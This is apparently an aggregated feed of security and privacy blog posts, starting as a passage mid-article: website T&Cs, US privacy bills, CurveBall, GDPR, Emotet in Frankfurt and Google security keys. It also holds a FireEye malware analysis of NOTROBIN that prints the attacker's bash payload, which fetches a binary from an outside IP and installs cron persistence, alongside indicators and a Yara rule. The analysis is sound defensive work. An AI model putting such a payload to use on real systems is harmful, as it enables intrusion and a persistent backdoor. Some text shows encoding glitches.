Full details on how to access these solutions are outlined in knowledge-base article KB92322. Additional products may be updated with additional countermeasures and defenses as our research uncovers more. We will continue to update knowledge-base article KB92322 with any additional recommendations or findings.

The post McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability appeared first on McAfee Blogs.

What Website Owners Should Know About Terms and Conditions

All website owners should consider terms and conditions (T&Cs) to be a form of legal protection as they establish the responsibility and rights of the involved parties. T&Cs provide full security should anything go amiss and they also help you settle any disputes quickly without having to resort to the courts.

Is it a legal requirement to include T&Cs?
No, but it’s always best to include terms and conditions on your website as they will enable you to reduce your potential liabilities. It is essential that you let your customers or visitors know about their rights; if you’re not clear about your policies, they may dispute matters such as cancellation options, item returns and other rights, putting your company at a disadvantage. Additionally, if areas are unclear in your terms and conditions or even not mentioned, it may mean that you are liable to give your customer additional rights than are given under statutory.
Do you have to include GDPR provisions?
Website owners, even those outside the European Union (EU), should also consider incorporating the General Data Protection Regulation. Inserting a data protection clause can reassure your customers that their data will not be used for inappropriate purposes. You can include the majority of the GDPR obligations in your site’s privacy policy.

What should you include in the T&Cs?
If you are an online seller, it is essential to explain to customers the various processes involved, such as:
  • How to make a purchase
  • How to make a payment
  • How they will receive their products
  • How they can cancel orders
T&Cs help you establish boundaries by outlining what specific rights customers have. In return, you also inform them about your obligations as a seller and the limits of your legal liability.

What kind of protection can you expect from the T&Cs? It may not be uncommon for disputes to arise between you and your online customers or visitors. Therefore, it is essential to ensure that the terms and conditions are accessible, preferably on your website.

You also need to protect your website from copyright infringements. You can avoid potential disputes and confusion by specifying which sections are copyrighted and which are your intellectual property. You should also stipulate what visitors can do with your data. If there is any breach of your copyright or intellectual property, the terms and conditions should clearly explain how the problem will be resolved.

Are there standard T&Cs which apply to all websites?
There are general formats or templates of T&Cs that you can obtain for free online. However, there is always the possibility that these documents will not cover specific aspects of your business or will not include the relevant terms. If you omit an essential term from your website, you may find yourself vulnerable if a dispute arises. Therefore, it is critical that you customise your terms and conditions so they are suitable for your website and business.
  • Product and service offerings – No two businesses are alike, even if you sell the same products and services. For example, your competitor may only accept PayPal but you may allow other modes of payment.
  • Industry or target audience – In every industry, there are specific provisions that need to be included in the T&Cs. For example, customers may have a legal right to cancel or return their purchases within a specified period.
Can website owners enforce their T&Cs?
Your T&Cs are like any other enforceable contract. Nevertheless, you must ensure that they don’t contravene existing consumer laws or government regulations. Remember, you should only incorporate clauses that you can legally apply.

Conclusion
Terms and conditions are necessary for all businesses, including e-commerce sites. It is essential that you create T&Cs that are suitable for your products and services, and that they are legally enforceable. You also need to periodically review your T&Cs, especially if there have been any significant changes to your business structure or the law. Moreover, they must be accessible to your online customers and visitors. If they are not aware of your T&Cs, you may find it difficult to enforce them if a problem arises.

Written by Kerry Gibbs, a legal expert at BEB Contract and Legal Services.

2020 Trend Alert: Consumer Privacy

Consumer privacy

We are only a few weeks into 2020, and it is safe to say that consumer privacy is all the rage. California kicked off the movement with the California Consumer Privacy Act (CCPA), AB 375, which went into effect on January 1, 2020. The act aims to give consumers more rights to their personal data. Since then, Washington, New Hampshire, and New York have all proposed similar consumer privacy bills that ??? if passed ??? will have an effect not only on consumers, but on also on businesses that operate in these states.

Take a look at the bills, then consider the steps your business can take to help comply with the regulations.

California Consumer Privacy Act

The newly established rights allow consumers to request records of what personal data is collected and mandate the deletion or cease the sale of that information. The privacy act also regulates the data collected from minors and prevents businesses from discriminating against consumers that choose to exercise their rights.

Businesses that must adhere to the CCPA are those that collect personal data, conduct business in California, and fit into one or more of the following categories:

  • Gross annual revenue over $25 million
  • Buys, sells, or obtains the personal data of more than 50,000 consumers, devices, or households
  • Makes over 50 percent of its revenue from selling consumers??? data.ツ?

To further empower consumers, CCPA has also mandated data brokers to register with the Attorney General, providing information about who they are and what their collection practices entail. This information is loaded into a database and is accessible to all consumers.ツ?

Washington Privacy Act

On January 13, 2020, Washington State Senator, Reuven Carlyle, introduced the bill for the Washington Privacy Act (WPA), SB 5376. If granted, the bill will allow residents to see who is accessing their personal data, correct or delete data, or opt-out of targeted advertisements and profiling. Controllers will need to conduct data protection assessments regarding where they are processing personal data and additional assessments anytime there is a change to the processing that could affect consumers. The bill will also require companies to disclose data management policies to increase transparency and establish limits on the use of facial recognition technology.

New Hampshire Privacy Act

Garrett Muscatel and Greg Indruk, U.S. State Representatives, reintroduced the bill for the Act Relative to the Collection of Personal Information by Businesses, HB 1680, to the New Hampshire House of Representatives. The bill, if passed, will give consumers the right to access, transfer, and delete their personal information, or deny the sale of such information. It will also give consumers the right to take action if their information is leaked. Like CCPA, the bill would apply to any legal entity that has annual gross revenues over $25,000,000, processes data of more than 50,000 New Hampshire consumers, or derives 50 percent of its revenue from selling personal information.

New York Privacy Act

The New York Privacy Act, SB 5642, was sent to the Senate Standing Committee on Consumer Protection on January 8, 2020. If approved, the bill will improve transparency, add protection, and allow for action against personal data. Personal data will include biometric information and internet or electric network activity.

What steps can you take to protect your clients and your business?

These regulations, and others, like the EU GDPR, signal that protecting and securing consumer data will increasingly be required, and application security plays a role in that requirement. Whether you are looking to expand your application security (AppSec) program to further comply with the new regulations, or you are looking to start your first AppSec program, we can help. Our Veracode Verified program gives you a clear AppSec roadmap to follow, helping to ensure that security is weaved into your development process.

In addition, by participating in the program, you can earn a Veracode Verified seal, which demonstrates to customers that you are dedicated to securing your applications and protecting their personal data.

Contact us today to learn how to better secure your applications to comply with industry standards.

What Is the CurveBall Bug? Here’s What You Need to Know 

Today, it was announced that researchers published proof of concept code (essentially, an exercise to determine if an idea is a reality) that exploits a recently patched vulnerability in the Microsoft Windows operating system (OS). The vulnerability, named CurveBall, impacts the components that handle the encryption and decryption mechanisms in the Windows OS, which inherently help protect sensitive information.

How It Works 

So how does this vulnerability work, exactly? For starters, unsafe sites or files can disguise themselves as legitimate ones.  When this vulnerability is exploited, CurveBall could allow a hacker to launch man-in-the-middle attacks, which is when a hacker secretly relays and possibly alters the communications between two unsuspecting users. Additionally, a hacker could use the vulnerability to intercept and fake secure web (HTTPS) connections or fake signatures for files and emails. Essentially, this means a hacker could place harmful files or run undetected malware on a system.

What It Impacts 

There are still questions surrounding what exactly is impacted by CurveBall, and subsequently what could be affected by the new code. According to Microsoft, CurveBall impacts Windows 10, Windows Server 2019, and Windows Server 2016 OS versions. With three popular operating systems afflicted, and the possibility to bypass basic security safeguards, patching is more important than ever. For unpatched systems, malware that takes advantage of this vulnerability may go undetected and slip past security features.

How to Stay Protected 

Now, what should you do to protect yourself from the CurveBall vulnerability? At McAfee, we are in the process of deploying an update to keep our loyal users secure from this vulnerability. In the meantime, however, there are a few things you should do to do to protect yourself. Start by following these tips:

  • Update your Windows 10 OS to get the latest security patches.
  • Use caution when surfing the web.
  • Only open files and emails from trusted sources.
  • Update your browsers to the latest versions if available.
  • If you are an enterprise customer, please reference KB92329 for information on McAfee enterprise defense from this vulnerability.
  • Contact McAfee Support if you have any further questions or need assistance.

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What Is the CurveBall Bug? Here’s What You Need to Know  appeared first on McAfee Blogs.

NIST Releases Version 1.0 of Privacy Framework

Our data-driven society has a tricky balancing act to perform: building innovative products and services that use personal data while still protecting people’s privacy. To help organizations keep this balance, the National Institute of Standards and Technology (NIST) is offering a new tool for managing privacy risk. The agency has just released Version 1.0 of the NIST Privacy Framework: A Tool for Improving Privacy through Enterprise Risk Management. Developed from a draft version in collaboration with a range of stakeholders, the framework provides a useful set of privacy protection

Israeli spyware firm fails to get hacking case dismissed

Judge orders NSO Group to fight case brought by Saudi activist and pay his legal costs

An Israeli judge has rejected an attempt by the spyware firm NSO Group to dismiss a case brought against it by a prominent Saudi activist who alleged that the company’s cyberweapons were used to hack his phone.

The decision could add pressure on the company, which faces multiple accusations that it sold surveillance technology, named Pegasus, to authoritarian regimes and other governments that have allegedly used it to target political activists and journalists.

Continue reading...

I’m still on Windows 7 – what should I do?

Support for Windows 7 has ended, leaving Marcy wondering how they can protect themselves

I do a lot of work on a Windows 7 desktop PC that is about five years old. I’m a widow and can’t afford to run out and get a new PC at this time, or pay for Windows 10. If I do stay with Windows 7, what should I worry about, and how can I protect myself? I have been running Kaspersky Total Security for several years, which has worked well so far. Marcy

Microsoft Windows 7 – launched in 2009 – came to the end of its supported life on Tuesday. Despite Microsoft’s repeated warnings to Windows 7 users, there may still be a couple of hundred million users, many of them in businesses. What should people do next?

Continue reading...

404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor

As noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented, we’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family NOTROBIN.

Upon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.

Initial Compromise

This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable newbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:

127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] "POST
/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 - "-" "curl/7.67.0"

Figure 1: Web log showing exploitation

Unlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t recovered the POST body contents to see how it works.  In any case, exploitation causes the Bash one liner shown in Figure 2 to run on the compromised system:

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k
hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o
/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *
/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Figure 2: Bash exploit payload

This is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands includes:

  1. Kill and delete all running instances of netscalerd—a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.
  2. Creates a hidden staging directory /tmp/.init, download NOTROBIN to it, and enable the execute permission.
  3. Install /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.
  4. Manually execute NOTROBIN.

There’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.

The actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186 that appears to be an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after their embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple clients. Compartmenting payloads indicates the actor is exercising operational security.

FireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.

Jan 12 21:57:00 <cron.info> foo.netscaler /usr/sbin/cron[73531]:
(nobody) CMD (/var/nstmp/.nscache/httpd)

Figure 3: cron log entry showing NOTROBIN execution

Now, let’s turn our attention to what NOTROBIN does.

Analysis of NOTROBIN

NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

When executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.

Now the fun begins: it spawns two routines that periodically check for and delete exploits.

Every second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as PersonalBookmark.pl.

Eight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility does not delete files with a filename containing the secret key.

FireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time.

Across multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor follows a strong password policy!

Based on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.

/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go

Figure 4: Source filename recovered from NOTROBIN sample

/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go

Figure 5: Source filename recovered from NOTROBIN sample

We wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original source!

Outstanding Questions

NOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active on this port.


Figure 6: NOTROBIN logic that drops UDP traffic

There is also an empty function main.install_cron whose implementation has been removed, so alternatively, perhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a port listening on UDP 18634.


Figure 7: File handling listing of compromised NetScaler device

NOTROBIN Efficacy

During one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt.

127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] "GET
/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-"
"curl/7.47.0"

Figure 8: Web log entry showing a failed exploitation attempt

Note that the application server responded with HTTP 404 (“Not Found”) as this actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created – and before it could be used by the other actor.

FireEye has not yet identified if the actor has returned to NOTROBIN backdoors.

Conclusion

FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.

Indicators of Compromise and Discovery

Table 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time of observed activity. As of January 15, the vilarunners[.]cat domain currently resolves to a new IP address of 80.240.31[.]218.

IOC Item

Value

HTTP URL prefix

hxxps://95[.]179.163.186/wp-content/uploads/2018/09/

Directory

/var/nstmp/.nscache

Filename

/var/nstmp/.nscache/httpd

Directory

/tmp/.init

Filename

/tmp/.init/httpd

Crontab entry

/var/nstmp/.nscache/httpd

Listening UDP port

18634

Remote IP

95.179.163[.]186

Remote IP

80.240.31[.]218

Domain

vilarunners[.]cat

Table 1: Indicators of Compromise

Discovery on VirusTotal

You can use the following VTI queries to identify NOTROBIN variants on VirusTotal:

  • vhash:"73cee1e8e1c3265c8f836516c53ae042"
  • vhash:"e57a7713cdf89a2f72c6526549d22987"

Note, the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.

rule NOTROBIN

{

    meta:

        author = "william.ballenthin@fireeye.com"

        date_created = "2020-01-15"

    strings:

        $func_name_1 = "main.remove_bds"

        $func_name_2 = "main.xrun"

    condition:

        all of them

}

Figure 9: Yara rule that matches on NOTROBIN variants

Recovered Authentication Keys

FireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won’t publish them here out of concern for our customers, please reach out if you’re looking for NOTROBIN within your environment and we can provide a list.

Acknowledgements

Thank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer for collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across intel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN samples, and Ashley Frazer for refining the presentation and conclusions.

How Frankfurt Stopped Emotet In Its Tracks

During a time when ransomware continues to bring governments around the world to a halt, one city has turned the tables, by bringing their government to a halt pre-emptively to prevent ransomware.

According to ZDNet, in late December, Frankfurt, Germany—one of the world’s biggest financial hubs—reportedly shut down its IT network after its anti-malware platform identified an Emotet infection. The reported malware gained entry when an employee clicked on a malicious email that had been spoofed to look as though it came from a city authority.

Rather than risk further spread and subsequent, more damaging infection, government authorities made the difficult decision to halt the IT network until the Emotet threat was resolved. In so doing, all of the city’s IT functions were shut down for over 24 hours—including employee email, essential apps, and all services offered through the Frankfurt.de webpage. The move paid off, however—as IT department spokesman Gunter Marr told Journal Frankfurt, no lasting damage had occurred.

“In my opinion, Frankfurt made a very brave—probably not easy—decision to shut down the network to eradicate their Emotet infection,” said John Fokker, Head of Cyber Investigations for McAfee Advanced Threat Research. “Emotet infection is a precursor to Ryuk ransomware, so I think they dodged the proverbial bullet.”

The Emotet-Ransomware Connection

In many cases, the first sign of ransomware is the ransom demand itself, alerting you that you’ve been infected and asking you to pay up. The Emotet malware works a bit differently in that it is not, in itself, ransomware. Instead, it functions like the key to a door: Emotet infects the system, and once the system is “open,” access to the Emotet-infected network can be sold to ransomware groups and other cybercriminals, who may then utilize stolen credentials and simply “walk in.” In a recent campaign, once Emotet was downloaded, it in turn downloaded the Trickbot trojan from a remote host, which stole credentials and enabled a successful Ryuk ransomware infection.

However, the same multistep process that can deliver two paydays on a single deployment of ransomware is also its Achilles’ Heel. Since getting ransomware from an Emotet infection is generally a two or more-step process, if you can stop or eliminate Emotet at Step 1, the subsequent steps toward a ransomware infection cannot occur.

While Frankfurt’s Emotet infection and the subsequent shutdown led to more than a day’s loss in productivity, massive outages and major disruption, the city should be commended on its quick and level-headed response—had they attempted to preserve business operations or opted to take a wait-and-see approach, a potential ransomware infection could have cost them millions more in lost productivity and threat mitigation.

An Ounce of Prevention …

While Frankfurt was able to intercept the Emotet botnet in time, many others were not—another attack several days before, in a town just north of Frankfurt, resulted in massive disruption when the Emotet malware led to the successful deployment of Ryuk ransomware. In other words, the best and safest way to avoid a similar fate is to prevent an Emotet infection in the first place.

There are several steps you can take to keep Emotet from establishing a stronghold in your network:

  1. Educate Your Employees: The most important step is to educate your employees on how to identify phishing and social engineering attempts. Identify email security best practices, such as hovering over a link to identify the actual destination before clicking on a link, never giving account information over email, and mandating that all suspicious emails be immediately reported.
  2. Patch Vulnerabilities: The Trickbot trojan is frequently delivered as a secondary payload to Emotet. It depends on the Microsoft Windows EternalBlue vulnerability—patching this vulnerability is an important step to securing your network.
  3. Strengthen Your Logins: If Emotet does gain entrance, it can attempt to spread by guessing the login credentials of connected users. By mandating strong passwords and two-factor authentication, you can help limit the spread.
  4. Adopt Strong Anti-Malware Protection, And Ensure It’s Configured Properly: A timely alert from a capable anti-malware system enabled Frankfurt to stop Emotet. Adopting strong endpoint protection such as McAfee Endpoint Security (ENS) is one of the most important steps you can take to help prevent Emotet and other malware. Once it’s in place, you can maximize your protection by performing periodic maintenance and optimizing configurations.

Above all, don’t fall into the trap of thinking it couldn’t happen to you. According to the McAfee Labs Threats Report, ransomware grew by 118% in just the first quarter of 2019, and several new ransomware families were detected. If the spate of recent attacks is any indication, we may see similar trends in Q1 2020.

“The demand for access to large corporate or public sector networks is very high at the moment,” Fokker explained “Ransomware actors are constantly scanning, spearphishing, purchasing access gained from other malware infections, and obtaining log files from info-stealing malware to get a foothold into networks.”

“Every company or institution should be diligent and not ignore even the simplest breach—even if it happened more than a year ago,” Fokker said.

 

 

 

The post How Frankfurt Stopped Emotet In Its Tracks appeared first on McAfee Blogs.

GDPR Checklist For Small Businesses

The new General Data Protection Regulations (GDPR) which came into effect in 2018 meant some big changes in the way businesses collect and handle personal data. The idea behind the new legislation is to give individuals better access and control over their own personal data. While this is great news for individuals, it requires a little extra work from businesses who must now provide legal grounds for collecting data and must only use it for the intended purpose. What’s more, they need to follow these regulations to the letter and remain GDPR compliant at all times.

This applies to companies of all sizes – even your small business. If you collect personal data in any form, such as emails, addresses, names or financial details, your business needs to be GDPR compliant. If it’s found that you’re not effectively managing and protecting your data you could face a big fine. Though regulators may be a bit more lenient with smaller businesses depending on how much data you hold, an unwanted fine is always bad news. That’s why we’ve put together this checklist to help ensure your small business is GDPR compliant. In this guide we’ll look at:

  • Understanding your data and responsibilities
  • Defining your data consent policy
  • Access requests and disposing of old data
  • Setting up a data storage and security policy
  • Training all staff on GDPR
  • Creating data processing notices

  1. Understanding your data and responsibilities

In order to be GDPR compliant it’s important that you understand what data you’re collecting and your responsibilities as a business. It’s therefore a good idea to get clued up on what is defined as ‘personal data’ and set out strict guidelines on how much information you need to collect. This is because a huge part of GDPR is ensuring that you only collect personal information you actually need and that it is only used for the intended purpose. The less you collect the easier it is to stay compliant.

You’ll also want to ensure anyone that is involved in the handling of data understands how to collect and store the data effectively, as well as how to process it in line with GDPR. As you collect data, it’s a good idea to keep a note of how consent is being obtained and what processes the data goes through once it has been collected.

 

  1. Setting out your data consent policy

Getting clear and explicit consent from individuals to collect and use their data is one of the most important aspects of GDPR. For this reason, you need to outline to customers or those using your services why you’re collecting their data and how you intend to use it in the future. Once they have actively agreed, you can then collect their data – this is usually done through sign-up forms or pop-ups. However, if they do not give you permission then under no circumstances should you record their personal information.

You must be able to show that they have obtained consent for all the data that you have collected. Otherwise, you run the risk of being fined. Another point worth noting is that you can no longer rely on underhand tactics such as pre-ticked boxes to gain consent. This is now illegal under GDPR and can land you in trouble. Finally, you must make it easy for individuals to opt-out of receiving your communications. The best way to do this is by adding an unsubscribe button at the bottom of all emails.

 

  1. Access requests and disposing of old data

If you haven’t already, GDPR states that you must get re-permission from customers whose information you held before the new guidelines were implemented in May 2018. If they do not give you their consent once again or they do not reply to your email at all, you must delete their data as soon as possible. An important part of your GDPR checklist should be getting auditing processes in place that determine how long you will store data. For example, if a customer has not engaged with your brand in 12 months it is no longer necessary to keep their information and it should therefore be deleted.

What’s more, as part of GDPR every EU individual has the right to access their data. Therefore you need a system in place to deal with access requests. You’ll have 30 days from receiving the request to provide them with an electronic copy of all the information you have on them. They can also request that this be deleted, so you need a system in place to get this done as quickly as possible.

 

  1. Setting up a data storage and security policy

GDPR is set out to protect the rights and personal information of individuals, therefore you need to make sure you’re taking care of the data you’re collecting. This means knowing where it is stored and ensuring you’ve got the security measures in place to keep it safe. Mapping out all the places where you store data, be that email, databases or cloud-based systems, makes it easier to find and deal with access or deletion requests. Your storage and security policy should outline where everything is stored, how it is protected and who has access to said data.

You also need to know how data is being transferred and the flow of information around your business. This stops information seemingly getting lost or falling into the wrong hands. It also pays to have a system in place just in case your hardware is accessed or lost, whilst containing sensitive information. For example, if a laptop full of information is misplaced, having the data encrypted means you’re less likely to fall victim to a breach or face a fine.

 

  1. Training all staff on GDPR

Most data breaches or security mistakes come as a result of human error. But unfortunately, in this case ignorance isn’t bliss, you cannot use ignorance as an excuse for mishandling data. For this reason, it’s important that all members of your team are clued up on GDPR, their personal responsibilities for looking after personal data, and how to recognise a breach. As part of GDPR, you must report any data breaches within 72 hours, this becomes much easier if everyone in your team is educated on what this looks like and who they need to report to.

 

  1. Creating data processing notices

Finally, data handling needs to be a clear and transparent process and therefore it’s a good idea to create a notice to explain how your business collects and processes data. This is often called a Fair Processing Notice and can be sent out to customers/users as well as being displayed somewhere on your website. It should outline how you capture, use and store data, as well as giving instructions on how an individual can make and access or deletion request. This helps them to understand how you are protecting their data and can be great for building your reputation as a legitimate and caring business.

 

The post GDPR Checklist For Small Businesses appeared first on CyberDB.

Have an iPhone? Use it to protect your Google Account with the Advanced Protection Program



Phishing—when an online attacker tries to trick you into giving them your username and password—is one of the most common causes of account compromises. We recently partnered with The Harris Poll to survey 500 high-risk users (politicians and their staff, journalists, business executives, activists, online influencers) living in the U.S. Seventy-four percent of them reported having been the target of a phishing attempt or compromised by a phishing attack.

Gmail automatically blocks more than 100 million phishing emails every day and warns people that are targeted by government-backed attackers, but you can further strengthen the security of your Google Account by enrolling in the Advanced Protection Program—our strongest security protections that automatically help defend against evolving methods attackers use to gain access to your personal and work Google Accounts and data.

Security keys are an important feature of the Advanced Protection Program, because they provide the strongest protection against phishing attacks. In the past, you had to separately purchase and carry physical security keys. Last year, we built security keys into Android phones—and starting today, you can activate a security key on your iPhone to help protect your Google Account.

Activating the security key on your iPhone with Google’s Smart Lock app

Security keys use public-key cryptography to verify your identity and URL of the login page, so that an attacker can’t access your account even if they have your username or password. Unlike other two-factor authentication (2FA) methods that try to verify your sign-in, security keys are built with FIDO standards that provide the strongest protection against automated bots, bulk phishing attacks, and targeted phishing attacks. You can learn more about security keys from our Cloud Next ‘19 presentation.


Approving the sign-in to a Google Account with Google’s SmartLock app on an iPhone

On your iPhone, the security key can be activated with Google’s Smart Lock app; on your Android phone, the functionality is built in. The security key in your phone uses Bluetooth to verify your sign-in on Chrome OS, iOS, macOS and Windows 10 devices without requiring you to pair your devices. This helps protect your Google Account on virtually any device with the convenience of your phone.

How to get started

Follow these simple steps to help protect your personal or work Google Account today:
  • Activate your phone’s security key (Android 7+ or iOS 10+)
  • Enroll in the Advanced Protection Program
  • When signing in to your Google Account, make sure Bluetooth is turned on on your phone and the device you’re signing in on.
We also highly recommend registering a backup security key to your account and keeping it in a safe place, so you can get into your account if you lose your phone. You can get a security key from a number of vendors, including Google, with our own Titan Security Key.

If you’re a Google Cloud customer, you can find out more about the Advanced Protection Program for the enterprise on our G Suite Updates blog.

Here’s to stronger account security—right in your pocket.

NIST Requesting Information to Upgrade the iEdison System

The National Institute of Standards and Technology (NIST) plans to begin modernizing the Interagency Edison System (iEdison) by using feedback and insights from the 32 agencies that currently use the older platform. NIST will launch the redesigned iEdison as a digital, governmental tool for the 21st century under the guidance of the Lab-to-Market cross agency priority goal and the White House’s Office of Science and Technology Policy and by focusing on advancing the President’s Management Agenda. The original iEdison platform was created in 1995 and hosted by the National Institute of Health

Iranian Threat Actors: Preliminary Analysis

Nowadays Iran’s Cybersecurity capabilities are under microscope, many news sites, gov. agencies and security experts warn about a possible cybersecurity infiltration from Iranian government and alert to increase cybersecurity defensive levels. Today I want to share a quick and short study based on cross correlation between MITRE ATT&CK and Malpedia about some of the main threat actors attributed to Iran. The Following sections describe the TTPs (Tactics, Techniques and Procedures) used by some of the most influential Iranian APT groups. Each section comes with a main graph which is built by scripting and which comes without legend, so please keep in mind while reading that: the red circles represent the analyzed threat actors, the green circles represent threat actor’s used techniques, the blue circles represent the threat actor’s used Malware and the black circles represent the threat actor’s used tool sets.

OilRig

According to Malpedia: “OilRig is an Iranian threat group operating primarily in the Middle East by targeting organizations in this region that are in a variety of different industries; however, this group has occasionally targeted organizations outside of the Middle East as well. It also appears OilRig carries out supply chain attacks, where the threat group leverages the trust relationship between organizations to attack their primary targets.” The threat actor uses opensource tools such as Mimikatz and laZagne, common sysadmin toolset available on Microsoft distribution or sysinternals such as: PsExec, CertUtil, Netstat, SystemInfo, ipconfig and tasklist. Bonupdater, Helminth, Quadangent and PowRuner are some of the most sophisticated Malware attributed to OilRig and analyzed over the past few years. Techniques (green) are mainly focused in the lateral movements and in getting persistence on the victim infrastructure; few of them involved exploiting or 0days initiatives.

OilRig TTP

Those observations would suggest a powerful group mostly focused on staying hidden rather than getting access through advanced techniques. Indeed no 0days or usage of advanced exploits is found over the target infrastructure. If so we are facing a state-sponsored group with high capabilities in developing persistence and hidden communication channels (for example over DNS) but without a deep interest in exploiting services. This topic would rise a question: OilRig does not need advanced exploiting capabilities because it is such a simple way to get into a victim infrastructure ? For example by using: user credential leaks, social engineering toolkits, targeted phishing, and so on and so forth or is more on there to be discovered ?

MuddyWater

